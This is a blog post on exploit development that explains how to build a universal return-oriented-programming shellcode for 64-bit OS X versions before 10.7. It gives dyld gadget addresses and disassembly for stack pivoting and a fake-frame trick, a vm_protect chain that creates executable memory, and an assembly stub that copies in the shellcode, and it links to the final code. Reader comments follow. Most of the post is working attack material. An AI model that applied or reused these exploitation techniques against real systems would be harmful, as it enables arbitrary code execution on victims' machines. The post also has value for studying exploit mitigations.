Home > Exploit development > Universal ROP shellcode for OS X x64

Universal ROP shellcode for OS X x64

One of the hurdles one will encounter during OS X exploitation is ASLR/DEP combination for 64-bit processes (32bit don’t have DEP [1]). When implemented correctly, it’s an effective mitigation, which can be circumvented only with an info leak. (Un)fortunately, OS X versions up to recent Lion (10.7) offer only incomplete ASLR which still allows attackers to succeed in their efforts to execute arbitrary code. One of the problems (among others) is dyld (dynamic loader) image being located at the same address in every process. This makes ROP possible — by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.

The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that that rax/rdi have specific values. Due to x64 calling convention [2] it is very probable that this precondition is met. Nevertheless it would be useful to create a shellcode with weaker assumptions — that’s exactly what this post is about. We will create a generic ROP shellcode, similiar to sayonara, but for OS X :).

Stack pivoting

We assume that rsp is fully controlled. Sometimes, achieving such state is a nontrivial task in itself — for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described — we start with rax pointing to controlled memory, and rdi to a valid buffer. We then set rsp = rax with:

0x00007fff5fc24c8b mov    QWORD PTR [rdi+0x38],rax
(irrelevant)
0x00007fff5fc24cd8 mov    rsp,QWORD PTR [rdi+0x38]
0x00007fff5fc24cdc pop    rdi
0x00007fff5fc24cdd ret

Easy! The problem is, we might not be so lucky to start with rax pointing to fully controlled memory. For example, we may start with the following:

call [rax+0x100]

Where memory in range [rax, rax+0xF0] is random, and we control buffer starting at rax+0xF1. Starting conditions for every bug are different and pivoting the stack can be even harder than creating a ROP chain, since during pivoting the state we start with can be completely arbitrary, when during ROP we already control the stack.

There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help :). That brings us to an annoying problem: “leave” instruction. “Leave” is equivalent to:

mov rsp, rbp
pop rbp

If we don’t control rbp, we will lose control of the stack. The problem is, “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.

Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:

call [rax]+------------+
(...)<--------------+  |
call [rax+4]+       |  |
            |       |  +----> push rbp
            |       |         mov  rbp, rsp
+-----------+       |         (...)
|                   |         call [rax+8]+
|                   |                     |
+-->continue        |      +--------------+
                    |      |
                    |      |
                    |      +->(gadget)
                    |         leave
                    +--------+ret

Start from call [rax] and follow the execution flow along the arrows. With such construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them, one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]”, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”. Here’s an example of such dispatcher, from dyld:

 
DISPATCHER:
__text:00007FFF5FC0D1BF                 call    qword ptr [rax+78h]
__text:00007FFF5FC0D1C2                 mov     rsi, rax
__text:00007FFF5FC0D1C5                 test    rax, rax
__text:00007FFF5FC0D1C8                 jz      short loc_7FFF5FC0D1E0
__text:00007FFF5FC0D1CA                 mov     rax, [rbx]
__text:00007FFF5FC0D1CD                 mov     rcx, rbx
__text:00007FFF5FC0D1D0                 mov     rdx, r12
__text:00007FFF5FC0D1D3                 mov     rdi, rbx
__text:00007FFF5FC0D1D6                 call    qword ptr [rax+80h]

FAKE FRAME SETUP:
__text:00007FFF5FC0CD44                 push    rbp
__text:00007FFF5FC0CD45                 mov     rbp, rsp
__text:00007FFF5FC0CD48                 mov     [rbp+var_18], rbx
__text:00007FFF5FC0CD4C                 mov     [rbp+var_10], r12
__text:00007FFF5FC0CD50                 mov     [rbp+var_8], r13
__text:00007FFF5FC0CD54                 sub     rsp, 20h
__text:00007FFF5FC0CD58                 mov     r12, rdi
__text:00007FFF5FC0CD5B                 mov     r13d, esi
__text:00007FFF5FC0CD5E                 mov     rax, [rdi]
__text:00007FFF5FC0CD61                 call    qword ptr [rax+1A0h]

Few preconditions related to register values must be met, for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps, or calls, to set registers and memory to necessary values.

“Leave” problem is particulary crippling during pivoting and that’s when fake frames should be used. During ROP, it’s easier to just control rbp and point it to memory set earlier.

ROP

Plan is simple: use gadgets from dyld to create RWX memory area  (using vm_protect), then copy normal shellcode to that area, and jump to it.

Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:

__text:00007FFF5FC0D34A                 mov     r8d, ebx        ; new_protection
__text:00007FFF5FC0D34D                 xor     ecx, ecx        ; set_maximum
__text:00007FFF5FC0D34F                 mov     rdx, rax        ; size
__text:00007FFF5FC0D352                 mov     rsi, [rbp+address] ; address
__text:00007FFF5FC0D356                 lea     rax, _mach_task_self_
__text:00007FFF5FC0D35D                 mov     edi, [rax]      ; target_task
__text:00007FFF5FC0D35F                 call    _vm_protect
__text:00007FFF5FC0D364                 test    eax, eax
__text:00007FFF5FC0D366                 jz      short loc_7FFF5FC0D38D
__text:00007FFF5FC0D38D loc_7FFF5FC0D38D:
__text:00007FFF5FC0D38D                 cmp     byte ptr [r12+0FAh], 0
__text:00007FFF5FC0D396                 jz      short loc_7FFF5FC0D406
__text:00007FFF5FC0D406 loc_7FFF5FC0D406:
__text:00007FFF5FC0D406                 mov     rbx, [rbp+var_28]
__text:00007FFF5FC0D40A                 mov     r12, [rbp+var_20]
__text:00007FFF5FC0D40E                 mov     r13, [rbp+var_18]
__text:00007FFF5FC0D412                 mov     r14, [rbp+var_10]
__text:00007FFF5FC0D416                 mov     r15, [rbp+var_8]
__text:00007FFF5FC0D41A                 leave
__text:00007FFF5FC0D41B                 retn

This is the same technique as in [1]. Few registers need to be set for this to work: registers used as parameters for vm_protect and rbp, to survive “leave / ret” at the end. We can set them one by one, jumping over different gadgets like described in [1], or set them all at once, using the following:

__text:00007FFF5FC24CA1                 mov     rax, [rdi]
__text:00007FFF5FC24CA4                 mov     rbx, [rdi+8]
__text:00007FFF5FC24CA8                 mov     rcx, [rdi+10h]
__text:00007FFF5FC24CAC                 mov     rdx, [rdi+18h]
__text:00007FFF5FC24CB0                 mov     rsi, [rdi+28h]
__text:00007FFF5FC24CB4                 mov     rbp, [rdi+30h]
__text:00007FFF5FC24CB8                 mov     r8, [rdi+40h]
__text:00007FFF5FC24CBC                 mov     r9, [rdi+48h]
__text:00007FFF5FC24CC0                 mov     r10, [rdi+50h]
__text:00007FFF5FC24CC4                 mov     r11, [rdi+58h]
__text:00007FFF5FC24CC8                 mov     r12, [rdi+60h]
__text:00007FFF5FC24CCC                 mov     r13, [rdi+68h]
__text:00007FFF5FC24CD0                 mov     r14, [rdi+70h]
__text:00007FFF5FC24CD4                 mov     r15, [rdi+78h]
__text:00007FFF5FC24CD8                 mov     rsp, [rdi+38h]
__text:00007FFF5FC24CDC                 pop     rdi
__text:00007FFF5FC24CDD                 retn

We can fill a buffer from dyld’s .data section with values we want to set registers with and simply call the above gadget. The only problem with this approach is rsp being overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory :).
Below is a WRITE MEM gadget sequence we can use.

__text:00007FFF5FC23373                 pop     rbx
__text:00007FFF5FC23374                 retn

__text:00007FFF5FC24CDC                 pop     rdi
__text:00007FFF5FC24CDD                 retn

__text:00007FFF5FC24CE1                 mov     [rdi+8], rbx
__text:00007FFF5FC24CE5                 mov     [rdi+10h], rcx
__text:00007FFF5FC24CE9                 mov     [rdi+18h], rdx
__text:00007FFF5FC24CED                 mov     [rdi+20h], rdi
__text:00007FFF5FC24CF1                 mov     [rdi+28h], rsi
__text:00007FFF5FC24CF5                 mov     [rdi+30h], rbp
__text:00007FFF5FC24CF9                 mov     [rdi+38h], rsp
__text:00007FFF5FC24CFD                 add     qword ptr [rdi+38h], 8
__text:00007FFF5FC24D02                 mov     [rdi+40h], r8
__text:00007FFF5FC24D06                 mov     [rdi+48h], r9
__text:00007FFF5FC24D0A                 mov     [rdi+50h], r10
__text:00007FFF5FC24D0E                 mov     [rdi+58h], r11
__text:00007FFF5FC24D12                 mov     [rdi+60h], r12
__text:00007FFF5FC24D16                 mov     [rdi+68h], r13
__text:00007FFF5FC24D1A                 mov     [rdi+70h], r14
__text:00007FFF5FC24D1E                 mov     [rdi+78h], r15
__text:00007FFF5FC24D22                 mov     rsi, [rsp+0]
__text:00007FFF5FC24D26                 mov     [rdi+80h], rsi
__text:00007FFF5FC24D2D                 retn

First we pop the value, then the address and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher is memory, from rdi+0x10, to rdi+0x80, so we need to remember to write to LOWER addresses first.

We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.

; copy normal shellcode to RWX area
; size = 0x1000
stub:
    lea rsi, [r15+offset]
    xor rcx, rcx
    inc rcx
    shl rcx, 12
    lea rdi, [rel normal_shellcode] ;rip relative addressing
    rep movsb
normal_shellcode:

rsi is set to point to old stack (passed in r15), normal shellcode starts from a constant offset. We save a bit of space using rip-relative addressing (x64 feature) to set rdi, rather than a constant 8-byte address.

To summarize:

  • set register values in dyld’s .data buffer
  • create a fake stack and a fake stack frame in memory
  • copy stub to future RWX area
  • set all registers to correct values
  • use vm_protect to create RWX area
  • load r15 with previous stack pointer
  • jump to RWX memory
  • stub will copy our “normal” shellcode from old stack to RWX mem
  • ???
  • PROFIT!

That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with javascript (like in Safari ;)), size of shellcode is not critical.

You can download the final version here.

References:

[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010

[2] Jon Larimer, Intro to x64 Reversing, 2011

  1. Eivind
    25/07/2011 at 02:07

    That is very clever, did it take long time do figure out?

    • 25/07/2011 at 08:08

      2 days to finish shellcode and write this post. It’s simple if you have a bit of exp. in exploit dev.

  2. 25/07/2011 at 20:38

    Nice work!

  3. Eivind
    25/07/2011 at 21:22

    I must also say that it is so interesting that i just might look into exploit dev!

  4. miki4you
    09/08/2011 at 19:13

    great work !

    how many years did it take to learn assembler so good?
    i’m only 16years old and i’ve 2+ years exp. in c , c++ writing some verry usefull programmes 🙂 i also read the book art of explonation but i think assembler is some of the haviest thinks i’ve ever seen ..

    • miki4you
      09/08/2011 at 19:13

      greez from switzerland , and sorry for my english

  5. aLS
    13/09/2011 at 23:04

    Hey man! Excellent work.
    Did you tested it with a 64bit process over 10.7? In two runs of Safari ‘vmmap pid | grep “usr/lib/dyld”‘ throwed different addresses on each run for every section :(.

    Thank you in advance.

    • 13/09/2011 at 23:06

      That’s because 10.7 has full ASLR 🙂

  6. aLS
    13/09/2011 at 23:52

    Heh, ok. i though you were using an inclusive “up to”.

  1. 14/09/2013 at 17:06
  2. 20/10/2014 at 05:13
  3. 10/10/2016 at 13:08

Leave a comment